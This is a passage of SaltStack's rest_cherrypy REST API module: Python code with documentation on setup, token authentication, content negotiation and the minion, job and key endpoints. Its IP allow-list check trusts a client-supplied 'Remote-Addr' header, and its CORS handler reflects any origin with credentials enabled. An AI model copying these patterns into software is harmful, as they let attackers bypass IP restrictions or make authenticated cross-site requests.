daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
    '''
    .. versionadded:: 2016.3.0
    Verifies user requests against the API whitelist (user/IP pairs), in order
    to provide whitelisting for the API similar to the master's, but over the API.
    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
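# For example, a request carrying "Accept: application/x-yaml" matches the
# second entry above, so the handler's return value is rendered with
# yaml.safe_dump; application/json is listed first and wins ties.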
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
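# Standalone sketch of the fallback rule text_processor implements: try the
# body as JSON, otherwise keep it verbatim. This helper exists only for
# illustration and is not called by the tools above.
def _parse_text_body(body):
    try:
        return json.loads(body)
    except ValueError:
        return body
# e.g. _parse_text_body('{"a": 1}') -> {'a': 1}; _parse_text_body('hi') -> 'hi'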
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors are all intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
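# Illustrative client-side counterpart to hypermedia_in (not part of the
# original module): the Content-Type header selects yaml_processor above.
# The URL and credentials are placeholders.
def _demo_yaml_post(url='http://localhost:8000/run'):
    import requests
    body = (
        "client: local\n"
        "tgt: '*'\n"
        "fun: test.ping\n"
        "username: saltdev\n"
        "password: saltdev\n"
        "eauth: pam\n"
    )
    return requests.post(url, data=body,
                         headers={'Content-Type': 'application/x-yaml'})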
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
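# Standalone illustration of what lowdata_fmt does to a urlencoded POST: a
# single dict becomes a one-chunk lowstate list and 'arg' is listified. The
# sample data is an assumption.
def _demo_lowdata_fmt():
    data = {'client': 'local', 'tgt': '*', 'fun': 'test.kwarg', 'arg': 'one=1'}
    if 'arg' in data and not isinstance(data['arg'], list):
        data['arg'] = [data['arg']]
    return [data]  # [{'client': 'local', ..., 'arg': ['one=1']}]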
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# If the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending positional args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
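# End-to-end sketch (illustrative only) of driving LowDataAdapter from
# Python with the requests library. The base URL and credentials are
# placeholders; /login is defined by the Login class further down.
def _demo_lowstate_roundtrip(base='http://localhost:8000'):
    import requests
    session = requests.Session()
    session.headers['Accept'] = 'application/json'
    # Obtain a session token from /login ...
    login = session.post(base + '/login', json={
        'username': 'saltdev', 'password': 'saltdev', 'eauth': 'pam'})
    token = login.json()['return'][0]['token']
    # ... then send a lowstate chunk to the root URL.
    resp = session.post(base + '/',
                        json=[{'client': 'local', 'tgt': '*',
                               'fun': 'test.ping'}],
                        headers={'X-Auth-Token': token})
    return resp.json()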
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
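# Illustrative follow-up to Minions.POST (not part of the original module):
# start an async job, then poll the /jobs link from the response until the
# return arrives. Base URL and token are placeholders; real code should
# bound the loop with a timeout.
def _demo_async_job(base='http://localhost:8000', token='<session token>'):
    import time
    import requests
    headers = {'X-Auth-Token': token, 'Accept': 'application/json'}
    start = requests.post(base + '/minions', headers=headers,
                          data={'tgt': '*', 'fun': 'test.ping'})
    href = start.json()['_links']['jobs'][0]['href']
    while True:
        ret = requests.get(base + href, headers=headers).json()['return'][0]
        if ret:
            return ret
        time.sleep(1)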
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
